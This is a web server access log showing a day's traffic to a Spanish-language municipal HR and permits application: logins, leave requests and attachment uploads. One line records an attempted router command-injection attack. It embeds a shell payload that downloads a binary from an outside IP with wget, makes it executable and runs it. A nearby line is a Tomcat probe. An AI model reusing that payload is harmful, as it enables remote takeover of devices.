186.103.157.42 - - [26/Apr/2024:11:32:37 -0300] "POST /cormun/servlet/trsolicitudot?034a8a6c9ede6ef513c27d5d6c86bd27,gx-no-cache=1714142680783 HTTP/1.1" 200 10563
181.212.47.137 - - [26/Apr/2024:11:32:40 -0300] "POST /cormun/servlet/trsolicitudgral?e670f000380c3dd0fe06a1418bbd7bc0,,gx-no-cache=1714141856698 HTTP/1.1" 200 5266
190.171.149.82 - - [26/Apr/2024:11:33:04 -0300] "GET /cormun/static/trsolicitudot.js?202211298465651 HTTP/1.1" 200 54040
190.171.149.82 - - [26/Apr/2024:11:33:14 -0300] "GET /cormun/servlet/solicitudot?INS,0,0,false, HTTP/1.1" 200 15916
190.171.149.82 - - [26/Apr/2024:11:33:14 -0300] "GET /cormun/static/gxcfg.js?20221129840861 HTTP/1.1" 200 953
190.171.149.82 - - [26/Apr/2024:11:33:17 -0300] "GET /cormun/static/solicitudot.js?20221129840983 HTTP/1.1" 200 74072
190.171.149.82 - - [26/Apr/2024:11:33:36 -0300] "POST /cormun/servlet/solicitudot?gx-no-cache=1714141901505 HTTP/1.1" 200 4031
190.171.141.138 - - [26/Apr/2024:11:33:36 -0300] "GET /cormun/servlet/trpermisosadjuntos?10812480,20240426101219,P, HTTP/1.1" 200 6823
190.171.149.82 - - [26/Apr/2024:11:33:37 -0300] "POST /cormun/servlet/solicitudot?1ff5f0efcf16856ddfe4451bae8f983c,INS,0,0,false,,gx-no-cache=1714141902076 HTTP/1.1" 200 12603
190.171.149.82 - - [26/Apr/2024:11:33:37 -0300] "GET /cormun/servlet/solicitudot?715b0b614cc05fd40306e72b7603d8810ca1a3174856fa7d6fa5decd6cfc8eb8e4ff47928ca63b746f2bbb95f80c2f1b,gx-no-cache=1714141902295 HTTP/1.1" 200 111
190.171.149.82 - - [26/Apr/2024:11:33:37 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-icons_82798d_256x240.png HTTP/1.1" 404 1089
190.171.149.82 - - [26/Apr/2024:11:33:37 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-bg_flat_55_994d53_40x100.png HTTP/1.1" 404 1097
190.171.149.82 - - [26/Apr/2024:11:33:37 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-icons_ebccce_256x240.png HTTP/1.1" 404 1089
190.171.149.82 - - [26/Apr/2024:11:33:38 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-bg_highlight-soft_100_c6c2c8_1x100.png HTTP/1.1" 404 1117
190.171.141.138 - - [26/Apr/2024:11:33:38 -0300] "GET /cormun/servlet/permisosadjuntos?INS,10812480,P,20240426101219,, HTTP/1.1" 200 6120
190.171.141.138 - - [26/Apr/2024:11:33:38 -0300] "GET /cormun/static/about:blank HTTP/1.1" 404 1011
190.171.149.82 - - [26/Apr/2024:11:33:53 -0300] "GET /cormun/servlet/solicitudot?715b0b614cc05fd40306e72b7603d881950d25e651080e07371b8f1409abe36c30b6485f8564a966e6583639bd0f1c76,gx-no-cache=1714141918535 HTTP/1.1" 200 30
190.171.149.82 - - [26/Apr/2024:11:33:53 -0300] "GET /cormun/servlet/solicitudot?715b0b614cc05fd40306e72b7603d8814087cbda6f89a849989503b0833474cb,gx-no-cache=1714141918593 HTTP/1.1" 200 94
190.171.149.82 - - [26/Apr/2024:11:33:53 -0300] "GET /cormun/servlet/solicitudot?715b0b614cc05fd40306e72b7603d881a82502b61960770ff30883278ff827f3,gx-no-cache=1714141918647 HTTP/1.1" 200 29
190.171.141.138 - - [26/Apr/2024:11:33:54 -0300] "POST /cormun/servlet/permisosadjuntos?c7e8ed9cabb7ba675d87ca4a81066df4,INS,10812480,P,20240426101219,, HTTP/1.1" 200 116
190.171.141.138 - - [26/Apr/2024:11:33:54 -0300] "GET /cormun/servlet/hpexe_return? HTTP/1.1" 200 1039
190.171.141.138 - - [26/Apr/2024:11:33:54 -0300] "GET /cormun/servlet/trpermisosadjuntos?10812480,20240426101219,P, HTTP/1.1" 200 7309
190.171.149.82 - - [26/Apr/2024:11:33:56 -0300] "POST /cormun/servlet/solicitudot?gx-no-cache=1714141921442 HTTP/1.1" 200 255
190.171.153.50 - - [26/Apr/2024:11:33:58 -0300] "GET /cormun/static/Resources/PXToolsActionDisabled.gif HTTP/1.1" 200 53
190.171.153.50 - - [26/Apr/2024:11:33:58 -0300] "GET /cormun/static/Resources/PXToolsGridNew.png HTTP/1.1" 200 427
190.171.141.138 - - [26/Apr/2024:11:33:59 -0300] "POST /cormun/servlet/trpermisosadjuntos?c7e8ed9cabb7ba675d87ca4a81066df4,10812480,20240426101219,P,,gx-no-cache=1714141924956 HTTP/1.1" 200 90
190.171.141.138 - - [26/Apr/2024:11:33:59 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 984
190.171.141.138 - - [26/Apr/2024:11:33:59 -0300] "GET /cormun/servlet/trpermisosgoce HTTP/1.1" 200 14459
190.171.141.138 - - [26/Apr/2024:11:34:06 -0300] "POST /cormun/servlet/trpermisosgoce?c7e8ed9cabb7ba675d87ca4a81066df4,gx-no-cache=1714141931637 HTTP/1.1" 200 11522
190.171.141.138 - - [26/Apr/2024:11:34:06 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-icons_82798d_256x240.png HTTP/1.1" 404 1089
190.171.141.138 - - [26/Apr/2024:11:34:06 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-bg_highlight-soft_100_c6c2c8_1x100.png HTTP/1.1" 404 1117
190.171.141.138 - - [26/Apr/2024:11:34:06 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-bg_flat_55_fafafa_40x100.png HTTP/1.1" 404 1097
190.171.141.138 - - [26/Apr/2024:11:34:06 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-icons_8d78a5_256x240.png HTTP/1.1" 404 1089
190.171.141.138 - - [26/Apr/2024:11:34:09 -0300] "POST /cormun/servlet/trpermisosgoce?c7e8ed9cabb7ba675d87ca4a81066df4,gx-no-cache=1714141935045 HTTP/1.1" 200 11530
190.171.141.138 - - [26/Apr/2024:11:34:11 -0300] "POST /cormun/servlet/trpermisosgoce?c7e8ed9cabb7ba675d87ca4a81066df4,gx-no-cache=1714141937613 HTTP/1.1" 200 11529
190.171.141.138 - - [26/Apr/2024:11:34:12 -0300] "GET /cormun/servlet/trpermisosadjuntos?14243537,20240416114911,P, HTTP/1.1" 200 6827
190.171.141.138 - - [26/Apr/2024:11:34:14 -0300] "GET /cormun/servlet/permisosadjuntos?INS,14243537,P,20240416114911,, HTTP/1.1" 200 6125
190.171.141.138 - - [26/Apr/2024:11:34:14 -0300] "GET /cormun/static/about:blank HTTP/1.1" 404 1011
190.171.149.90 - - [26/Apr/2024:11:34:26 -0300] "GET /cormun/servlet/trlicencias? HTTP/1.1" 200 10062
190.171.149.90 - - [26/Apr/2024:11:34:26 -0300] "GET /cormun/servlet/trlicencias? HTTP/1.1" 200 10062
190.171.149.82 - - [26/Apr/2024:11:34:44 -0300] "GET /cormun/servlet/solicitudot?715b0b614cc05fd40306e72b7603d8814087cbda6f89a849989503b0833474cb,gx-no-cache=1714141969869 HTTP/1.1" 200 94
190.171.149.82 - - [26/Apr/2024:11:34:46 -0300] "GET /cormun/servlet/solicitudot?715b0b614cc05fd40306e72b7603d88111720fe227363f5cc7cd68b1993bc86e713222166bbc57ac13d97f1540525968d8708091a88e0cad321f7c59f024f91a6b35e83d178a25e7f34b043f26e3c22ecbbf7e6481db229e38aee82d1a6f09794727c857364a4883cf6e9ffbfc8cef4eb99828a90f82f94499740d154c97777a027767644e05d53e3a2f8a0a6a3810d66a1311cb8e8db8a93555fb28ce08564dee036a73c06590291442ae89d8bb3d83b36cf2e89692a2eb257fe663e0517d6d226a216166f4fa441bdd80dcbfa633ad57647f294ac982afc7a6388fe964dbe545ea16d99281ffcaf30909c0f4968d840ad0bbaa915951ecc723b45ec9781df5977dfbc93a44fe471b3c2b92f384a807e249a1c1acf9aa388ee8c8d773bef8e980bd82734fc485e21164550a2aadb06b945c70a5c88cf4220ad5b0571497bc19e23b7970d097f73f1f23a81f03d0a080f83214c04443d3b15cf3b19495ef2aab00ca84e5ff8592e14f6162094ce5c5ef468af464fa3416b69b61fa3051cb6085,gx-no-cache=1714141971059 HTTP/1.1" 200 30
186.103.157.42 - - [26/Apr/2024:11:34:46 -0300] "GET /cormun/servlet/treventos?2024,21290, HTTP/1.1" 200 8120
186.103.157.42 - - [26/Apr/2024:11:34:46 -0300] "GET /cormun/static/gxcfg.js?20201215584657 HTTP/1.1" 200 953
186.103.157.42 - - [26/Apr/2024:11:34:46 -0300] "GET /cormun/static/treventos.js?2020121558506 HTTP/1.1" 200 16063
190.171.149.82 - - [26/Apr/2024:11:34:52 -0300] "POST /cormun/servlet/solicitudot?gx-no-cache=1714141977770 HTTP/1.1" 200 30
190.171.149.82 - - [26/Apr/2024:11:34:58 -0300] "GET /cormun/servlet/prcontratosol?20214951,,,,,MD,,gxPopupLevel%3D0%3B HTTP/1.1" 200 7567
186.103.157.42 - - [26/Apr/2024:11:34:59 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1738
190.171.149.82 - - [26/Apr/2024:11:34:59 -0300] "GET /cormun/static/gxcfg.js?202211298464198 HTTP/1.1" 200 953
190.171.149.82 - - [26/Apr/2024:11:35:00 -0300] "GET /cormun/static/prcontratosol.js?202211298464288 HTTP/1.1" 200 15806
190.171.141.138 - - [26/Apr/2024:11:35:01 -0300] "POST /cormun/servlet/permisosadjuntos?c7e8ed9cabb7ba675d87ca4a81066df4,INS,14243537,P,20240416114911,, HTTP/1.1" 200 116
190.171.141.138 - - [26/Apr/2024:11:35:01 -0300] "GET /cormun/servlet/hpexe_return? HTTP/1.1" 200 1039
190.171.141.138 - - [26/Apr/2024:11:35:01 -0300] "GET /cormun/servlet/trpermisosadjuntos?14243537,20240416114911,P, HTTP/1.1" 200 7323
190.171.141.138 - - [26/Apr/2024:11:35:03 -0300] "POST /cormun/servlet/trpermisosadjuntos?c7e8ed9cabb7ba675d87ca4a81066df4,14243537,20240416114911,P,,gx-no-cache=1714141988827 HTTP/1.1" 200 90
190.171.141.138 - - [26/Apr/2024:11:35:03 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 1005
190.171.141.138 - - [26/Apr/2024:11:35:03 -0300] "GET /cormun/servlet/trpermisosgoce?gx-no-cache=1714141937613 HTTP/1.1" 200 14427
190.171.149.82 - - [26/Apr/2024:11:35:04 -0300] "POST /cormun/servlet/solicitudot?gx-no-cache=1714141989418 HTTP/1.1" 200 1479
190.171.149.82 - - [26/Apr/2024:11:35:04 -0300] "POST /cormun/servlet/solicitudot?gx-no-cache=1714141989501 HTTP/1.1" 200 38
190.171.149.82 - - [26/Apr/2024:11:35:04 -0300] "GET /cormun/servlet/solicitudot?715b0b614cc05fd40306e72b7603d8819af31804fee9631e6bd581dbf8bc5e0ea6dff43cb741550c89bcd391f64f616c82a6d16fcac1f1d50e5614d60238a96b59387d07b674bc02cb64ecc75bce0caa22e3b1f46abf27a5b01217335d40096307ca4ff83ae50ac38755267199c6c3ed,gx-no-cache=1714141989535 HTTP/1.1" 200 110
190.171.149.82 - - [26/Apr/2024:11:35:04 -0300] "POST /cormun/servlet/solicitudot?gx-no-cache=1714141989570 HTTP/1.1" 200 97
190.171.149.82 - - [26/Apr/2024:11:35:04 -0300] "GET /cormun/servlet/solicitudot?715b0b614cc05fd40306e72b7603d881c09ce9852df45d712b26d446aef80c3efd12f5801fb5aa9934be2cd5b5fe18774da6dc1cb66dbf8031bcc452ae90b30cb6fb567c68fafca27264f491edd928ab705217944ceadeb8601bb941fe751b6201f5bced1b8137840d794e92b5736419,gx-no-cache=1714141989619 HTTP/1.1" 200 29
190.171.149.82 - - [26/Apr/2024:11:35:04 -0300] "GET /cormun/servlet/solicitudot?715b0b614cc05fd40306e72b7603d881de14a51fe5f23206545a4cf9e44363525226adbb23a31ce621af7e88fd2fb056,gx-no-cache=1714141989651 HTTP/1.1" 200 134
190.171.141.138 - - [26/Apr/2024:11:35:05 -0300] "POST /cormun/servlet/trpermisosgoce?c7e8ed9cabb7ba675d87ca4a81066df4,gx-no-cache=1714141937613,gx-no-cache=1714141990964 HTTP/1.1" 200 11487
190.171.141.138 - - [26/Apr/2024:11:35:09 -0300] "GET /cormun/servlet/trautorizarpermisogoce? HTTP/1.1" 200 8514
190.171.141.138 - - [26/Apr/2024:11:35:13 -0300] "POST /cormun/servlet/trautorizarpermisogoce?c7e8ed9cabb7ba675d87ca4a81066df4,,gx-no-cache=1714141998700 HTTP/1.1" 200 5312
190.171.141.138 - - [26/Apr/2024:11:35:16 -0300] "GET /cormun/servlet/trlicencias? HTTP/1.1" 200 13534
186.103.157.42 - - [26/Apr/2024:11:35:23 -0300] "POST /cormun/servlet/hlogin?034a8a6c9ede6ef513c27d5d6c86bd27,gx-no-cache=1714142846784 HTTP/1.1" 200 90
186.103.157.42 - - [26/Apr/2024:11:35:23 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 947
186.103.157.42 - - [26/Apr/2024:11:35:23 -0300] "GET /cormun/servlet/hhome HTTP/1.1" 200 4377
190.171.149.90 - - [26/Apr/2024:11:35:37 -0300] "POST /cormun/servlet/trlicencias?4ac9c98f6596bda64d58dafc17f800a9,,gx-no-cache=1714142025159 HTTP/1.1" 200 5692
186.103.157.42 - - [26/Apr/2024:11:35:41 -0300] "GET /cormun/servlet/trautorizarsolicitud? HTTP/1.1" 200 7494
186.103.157.42 - - [26/Apr/2024:11:35:41 -0300] "GET /cormun/static/gxcfg.js?202211298474254 HTTP/1.1" 200 953
186.103.157.42 - - [26/Apr/2024:11:35:41 -0300] "GET /cormun/static/trautorizarsolicitud.js?202211298474588 HTTP/1.1" 200 53909
190.171.149.82 - - [26/Apr/2024:11:35:48 -0300] "GET /cormun/servlet/solicitudot?715b0b614cc05fd40306e72b7603d8819af31804fee9631e6bd581dbf8bc5e0ea6dff43cb741550c89bcd391f64f616c82a6d16fcac1f1d50e5614d60238a96b59387d07b674bc02cb64ecc75bce0caa22e3b1f46abf27a5b01217335d40096307ca4ff83ae50ac38755267199c6c3ed,gx-no-cache=1714142033065 HTTP/1.1" 200 110
186.103.157.42 - - [26/Apr/2024:11:35:52 -0300] "POST /cormun/servlet/trautorizarsolicitud?034a8a6c9ede6ef513c27d5d6c86bd27,,gx-no-cache=1714142875863 HTTP/1.1" 200 7788
190.171.149.82 - - [26/Apr/2024:11:35:53 -0300] "GET /cormun/static/menuarrow.gif HTTP/1.1" 404 1015
190.171.149.82 - - [26/Apr/2024:11:35:59 -0300] "GET /cormun/servlet/solicitudot?715b0b614cc05fd40306e72b7603d881d9e6f75857c607181773adfe1617eb495226adbb23a31ce621af7e88fd2fb056,gx-no-cache=1714142044118 HTTP/1.1" 200 30
186.103.157.42 - - [26/Apr/2024:11:36:02 -0300] "GET /cormun/servlet/treventos?2024,21258, HTTP/1.1" 200 9403
190.171.149.82 - - [26/Apr/2024:11:36:04 -0300] "POST /cormun/servlet/solicitudot?gx-no-cache=1714142047907 HTTP/1.1" 200 33
181.212.47.137 - - [26/Apr/2024:11:36:49 -0300] "GET /cormun/servlet/trsolicitudgral? HTTP/1.1" 200 28372
186.103.157.42 - - [26/Apr/2024:11:36:51 -0300] "POST /cormun/servlet/treventos?034a8a6c9ede6ef513c27d5d6c86bd27,2024,21258,,gx-no-cache=1714142934393 HTTP/1.1" 200 90
186.103.157.42 - - [26/Apr/2024:11:36:51 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 969
186.103.157.42 - - [26/Apr/2024:11:36:51 -0300] "GET /cormun/servlet/trautorizarsolicitud? HTTP/1.1" 200 10685
186.103.157.42 - - [26/Apr/2024:11:36:56 -0300] "POST /cormun/servlet/trautorizarsolicitud?034a8a6c9ede6ef513c27d5d6c86bd27,,gx-no-cache=1714142940113 HTTP/1.1" 200 7803
186.103.157.42 - - [26/Apr/2024:11:36:56 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-bg_highlight-soft_100_c6c2c8_1x100.png HTTP/1.1" 404 1117
186.103.157.42 - - [26/Apr/2024:11:36:56 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-icons_82798d_256x240.png HTTP/1.1" 404 1089
186.103.157.42 - - [26/Apr/2024:11:36:56 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-bg_flat_55_fafafa_40x100.png HTTP/1.1" 404 1097
186.103.157.42 - - [26/Apr/2024:11:36:56 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-icons_8d78a5_256x240.png HTTP/1.1" 404 1089
186.103.157.42 - - [26/Apr/2024:11:36:59 -0300] "GET /cormun/servlet/trautorizarsolicitud? HTTP/1.1" 200 10684
190.171.149.82 - - [26/Apr/2024:11:37:21 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1744
190.171.153.50 - - [26/Apr/2024:11:37:25 -0300] "POST /cormun/servlet/trcontratosolicitud?14898b76de1190b75a2972dc6cd4a971,,gx-no-cache=1714142130576 HTTP/1.1" 200 6337
190.171.153.50 - - [26/Apr/2024:11:37:25 -0300] "GET /cormun/static/Resources/PXToolsGridFirst.gif HTTP/1.1" 200 379
190.171.153.50 - - [26/Apr/2024:11:37:25 -0300] "GET /cormun/static/Resources/PXToolsGridPrevious.gif HTTP/1.1" 200 369
190.171.149.74 - - [26/Apr/2024:11:42:11 -0300] "GET /cormun/servlet/trsolicitudot? HTTP/1.1" 200 7197
190.171.153.50 - - [26/Apr/2024:11:43:00 -0300] "GET /cormun/servlet/trlicencias? HTTP/1.1" 200 10798
181.212.47.137 - - [26/Apr/2024:11:43:29 -0300] "POST /cormun/servlet/trsolicitudgral?6b8129a46348904e5b6c87cbcbc3c5fe,,gx-no-cache=1714142504958 HTTP/1.1" 200 105
181.212.47.137 - - [26/Apr/2024:11:43:29 -0300] "GET /cormun/SolicitudGral-8279.xls HTTP/1.1" 200 40448
190.171.141.106 - - [26/Apr/2024:11:43:49 -0300] "GET /cormun/servlet/trpermisosgoce? HTTP/1.1" 200 14532
190.171.153.50 - - [26/Apr/2024:11:45:16 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1731
190.171.141.106 - - [26/Apr/2024:11:45:24 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1718
190.171.141.106 - - [26/Apr/2024:11:45:29 -0300] "POST /cormun/servlet/hlogin?7640a5a5115f34a84b0fc60e82cc5524,gx-no-cache=1714142615346 HTTP/1.1" 200 90
190.171.141.106 - - [26/Apr/2024:11:45:29 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 948
190.171.141.106 - - [26/Apr/2024:11:45:29 -0300] "GET /cormun/servlet/hhome HTTP/1.1" 200 4267
190.171.141.106 - - [26/Apr/2024:11:45:35 -0300] "GET /cormun/servlet/trpermisosgoce? HTTP/1.1" 200 14528
190.171.141.106 - - [26/Apr/2024:11:45:49 -0300] "GET /cormun/servlet/permisogoce?INS,0,,, HTTP/1.1" 200 7161
174.138.2.203 - - [26/Apr/2024:11:46:06 -0300] "GET /tomcat.jsp HTTP/1.1" 404 981
174.138.2.203 - - [26/Apr/2024:11:46:07 -0300] "GET /dr/tomcat.jsp HTTP/1.1" 404 987
45.142.182.92 - - [26/Apr/2024:11:46:13 -0300] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id>`cd+/tmp;+rm+-rf+shk;+wget+http://103.163.214.97/shk;+chmod+777+shk;+./shk+tplink;+rm+-rf+shk`) HTTP/1.1" 404 1013
190.171.141.106 - - [26/Apr/2024:11:46:28 -0300] "GET /cormun/servlet/permisogoce?605196ea5247306804015cf7f37db43e7cc7634ae55b0e95da2206d24f7655e7a3e5980ad25fd2b6e5ca792374127ae45020a9289e3c5cc0049ff0ea27480e79,gx-no-cache=1714142674784 HTTP/1.1" 200 77
190.171.141.106 - - [26/Apr/2024:11:46:43 -0300] "GET /cormun/servlet/permisogoce?605196ea5247306804015cf7f37db43e2c4b0249201af686df32766a8cd7bcfa095cb81386f3b8eafaa38e4967d39881d15dfc0727cea6b35cddbf949af64244,gx-no-cache=1714142689807 HTTP/1.1" 200 48
190.171.141.106 - - [26/Apr/2024:11:46:56 -0300] "POST /cormun/servlet/permisogoce?7640a5a5115f34a84b0fc60e82cc5524,INS,0,,,,gx-no-cache=1714142701954 HTTP/1.1" 200 93
190.171.141.106 - - [26/Apr/2024:11:46:56 -0300] "GET /cormun/servlet/hpexe_return? HTTP/1.1" 200 1007
190.171.141.106 - - [26/Apr/2024:11:46:56 -0300] "GET /cormun/servlet/trpermisosgoce HTTP/1.1" 200 14750
190.171.141.106 - - [26/Apr/2024:11:47:05 -0300] "GET /cormun/servlet/trpermisosadjuntos?8980270,20240426104405,P, HTTP/1.1" 200 6584
190.171.141.106 - - [26/Apr/2024:11:47:10 -0300] "GET /cormun/servlet/permisosadjuntos?INS,8980270,P,20240426104405,, HTTP/1.1" 200 5908
190.171.141.106 - - [26/Apr/2024:11:47:10 -0300] "GET /cormun/static/about:blank HTTP/1.1" 404 1011
190.171.141.106 - - [26/Apr/2024:11:47:22 -0300] "POST /cormun/servlet/permisosadjuntos?7640a5a5115f34a84b0fc60e82cc5524,INS,8980270,P,20240426104405,, HTTP/1.1" 200 116
190.171.141.106 - - [26/Apr/2024:11:47:22 -0300] "GET /cormun/servlet/hpexe_return? HTTP/1.1" 200 1035
190.171.141.106 - - [26/Apr/2024:11:47:22 -0300] "GET /cormun/servlet/trpermisosadjuntos?8980270,20240426104405,P, HTTP/1.1" 200 6587
190.171.149.74 - - [26/Apr/2024:11:47:44 -0300] "GET /cormun/servlet/solicitudot?INS,0,0,false, HTTP/1.1" 200 15973
190.171.149.74 - - [26/Apr/2024:11:47:55 -0300] "POST /cormun/servlet/solicitudot?gx-no-cache=1714142758077 HTTP/1.1" 200 4022
190.171.149.74 - - [26/Apr/2024:11:47:55 -0300] "POST /cormun/servlet/solicitudot?c82052c7e42a3f8e323a217ad28e6842,INS,0,0,false,,gx-no-cache=1714142758205 HTTP/1.1" 200 12600
190.171.149.74 - - [26/Apr/2024:11:47:55 -0300] "GET /cormun/servlet/solicitudot?1437a4839ed834d7cd70e40ae3c5d41290f59823dfa3606f1f7baf2bc4a55fa9c5e9daef988a7aef19780ea431c79617,gx-no-cache=1714142758551 HTTP/1.1" 200 30
190.171.141.106 - - [26/Apr/2024:11:48:44 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1720
190.171.141.106 - - [26/Apr/2024:11:48:46 -0300] "POST /cormun/servlet/hlogin?5788ff70157091534d2e3b9e7f88fc45,gx-no-cache=1714142812453 HTTP/1.1" 200 421
190.171.141.106 - - [26/Apr/2024:11:48:50 -0300] "POST /cormun/servlet/hlogin?5788ff70157091534d2e3b9e7f88fc45,gx-no-cache=1714142816419 HTTP/1.1" 200 90
190.171.141.106 - - [26/Apr/2024:11:48:50 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 951
190.171.141.106 - - [26/Apr/2024:11:48:50 -0300] "GET /cormun/servlet/hhome HTTP/1.1" 200 4272
190.171.141.106 - - [26/Apr/2024:11:48:55 -0300] "GET /cormun/servlet/trpermisosgoce? HTTP/1.1" 200 14750
190.171.149.74 - - [26/Apr/2024:11:49:11 -0300] "GET /cormun/static/Resources/PXTools/ClosePrompt.png HTTP/1.1" 200 1036
190.171.149.74 - - [26/Apr/2024:11:49:11 -0300] "GET /cormun/static/Resources/resize.gif HTTP/1.1" 200 77
190.171.149.74 - - [26/Apr/2024:11:49:11 -0300] "GET /cormun/servlet/prbanco?,MD,,gxPopupLevel%3D0%3B HTTP/1.1" 200 6591
190.171.149.74 - - [26/Apr/2024:11:49:11 -0300] "GET /cormun/static/gxcfg.js?20201216131581 HTTP/1.1" 200 953
190.171.149.74 - - [26/Apr/2024:11:49:11 -0300] "GET /cormun/static/prbanco.js?20201216132311 HTTP/1.1" 200 10693
190.171.141.106 - - [26/Apr/2024:11:49:17 -0300] "GET /cormun/servlet/trpermisosadjuntos?8980270,20240426104405,P, HTTP/1.1" 200 6588
190.171.149.74 - - [26/Apr/2024:11:49:19 -0300] "GET /cormun/servlet/solicitudot?1437a4839ed834d7cd70e40ae3c5d412fc6a77013902141e0297477cfc5ff2a9,gx-no-cache=1714142842520 HTTP/1.1" 200 94
190.171.149.74 - - [26/Apr/2024:11:49:19 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-bg_highlight-soft_100_c6c2c8_1x100.png HTTP/1.1" 404 1117
190.171.149.74 - - [26/Apr/2024:11:49:19 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-icons_82798d_256x240.png HTTP/1.1" 404 1089
190.171.149.74 - - [26/Apr/2024:11:49:19 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-bg_flat_55_994d53_40x100.png HTTP/1.1" 404 1097
190.171.149.74 - - [26/Apr/2024:11:49:19 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-icons_ebccce_256x240.png HTTP/1.1" 404 1089
190.171.141.106 - - [26/Apr/2024:11:49:20 -0300] "GET /cormun/servlet/permisosadjuntos?INS,8980270,P,20240426104405,, HTTP/1.1" 200 5912
190.171.141.106 - - [26/Apr/2024:11:49:20 -0300] "GET /cormun/static/about:blank HTTP/1.1" 404 1011
190.171.149.74 - - [26/Apr/2024:11:49:23 -0300] "GET /cormun/servlet/solicitudot?1437a4839ed834d7cd70e40ae3c5d4129abfa5e034fdc08682122d10613d3dd6,gx-no-cache=1714142846368 HTTP/1.1" 200 70
190.171.141.106 - - [26/Apr/2024:11:49:33 -0300] "POST /cormun/servlet/permisosadjuntos?5788ff70157091534d2e3b9e7f88fc45,INS,8980270,P,20240426104405,, HTTP/1.1" 200 116
190.171.141.106 - - [26/Apr/2024:11:49:33 -0300] "GET /cormun/servlet/hpexe_return? HTTP/1.1" 200 1036
190.171.141.106 - - [26/Apr/2024:11:49:33 -0300] "GET /cormun/servlet/trpermisosadjuntos?8980270,20240426104405,P, HTTP/1.1" 200 7113
190.171.141.106 - - [26/Apr/2024:11:49:43 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1720
190.171.141.106 - - [26/Apr/2024:11:49:47 -0300] "POST /cormun/servlet/hlogin?5788ff70157091534d2e3b9e7f88fc45,gx-no-cache=1714142873426 HTTP/1.1" 200 90
190.171.141.106 - - [26/Apr/2024:11:49:47 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 982
190.171.141.106 - - [26/Apr/2024:11:49:47 -0300] "GET /cormun/servlet/trpermisosadjuntos?8980270,20240426104405,P, HTTP/1.1" 200 7111
200.54.100.179 - - [26/Apr/2024:11:49:49 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1725
200.54.100.179 - - [26/Apr/2024:11:49:49 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1735
190.171.141.106 - - [26/Apr/2024:11:49:52 -0300] "GET /cormun/servlet/trpermisosgoce? HTTP/1.1" 200 14748
200.54.100.179 - - [26/Apr/2024:11:49:52 -0300] "POST /cormun/servlet/hlogin?c3095aea5308f3386c892ad2524291c9,gx-no-cache=1714142877755 HTTP/1.1" 200 90
200.54.100.179 - - [26/Apr/2024:11:49:52 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 955
200.54.100.179 - - [26/Apr/2024:11:49:52 -0300] "GET /cormun/servlet/hhome HTTP/1.1" 200 4329
200.54.100.179 - - [26/Apr/2024:11:49:58 -0300] "GET /cormun/servlet/trlicencias? HTTP/1.1" 200 10241
200.54.100.179 - - [26/Apr/2024:11:49:58 -0300] "GET /cormun/static/gxcfg.js?202211298463625 HTTP/1.1" 200 953
200.54.100.179 - - [26/Apr/2024:11:49:58 -0300] "GET /cormun/static/trlicencias.js?202211298463889 HTTP/1.1" 200 41883
200.54.100.179 - - [26/Apr/2024:11:50:02 -0300] "GET /cormun/servlet/licenciaspermisos?INS,0,,, HTTP/1.1" 200 7936
200.54.100.179 - - [26/Apr/2024:11:50:02 -0300] "GET /cormun/static/gxcfg.js?202012153173 HTTP/1.1" 200 953
200.54.100.179 - - [26/Apr/2024:11:50:02 -0300] "GET /cormun/static/licenciaspermisos.js?2020121532136 HTTP/1.1" 200 38753
190.171.141.106 - - [26/Apr/2024:11:50:04 -0300] "POST /cormun/servlet/trpermisosgoce?5788ff70157091534d2e3b9e7f88fc45,,gx-no-cache=1714142890724 HTTP/1.1" 200 12012
190.171.141.106 - - [26/Apr/2024:11:50:04 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-bg_highlight-soft_100_c6c2c8_1x100.png HTTP/1.1" 404 1117
190.171.141.106 - - [26/Apr/2024:11:50:04 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-icons_82798d_256x240.png HTTP/1.1" 404 1089
190.171.141.106 - - [26/Apr/2024:11:50:04 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-icons_8d78a5_256x240.png HTTP/1.1" 404 1089
190.171.141.106 - - [26/Apr/2024:11:50:04 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-bg_flat_55_fafafa_40x100.png HTTP/1.1" 404 1097
200.54.100.179 - - [26/Apr/2024:11:50:13 -0300] "GET /cormun/servlet/licenciaspermisos?151b6041f873bb122d60ae4e7331cc9b7ae87b5e12b79ce10f6416b95da80d3846f67c128dff7d2539c368fb09e9fad5aeea40f954458211c1a161ca7698ea46,gx-no-cache=1714142898583 HTTP/1.1" 200 99
200.54.100.179 - - [26/Apr/2024:11:50:13 -0300] "POST /cormun/servlet/licenciaspermisos?c3095aea5308f3386c892ad2524291c9,INS,0,,,,gx-no-cache=1714142898615 HTTP/1.1" 200 5127
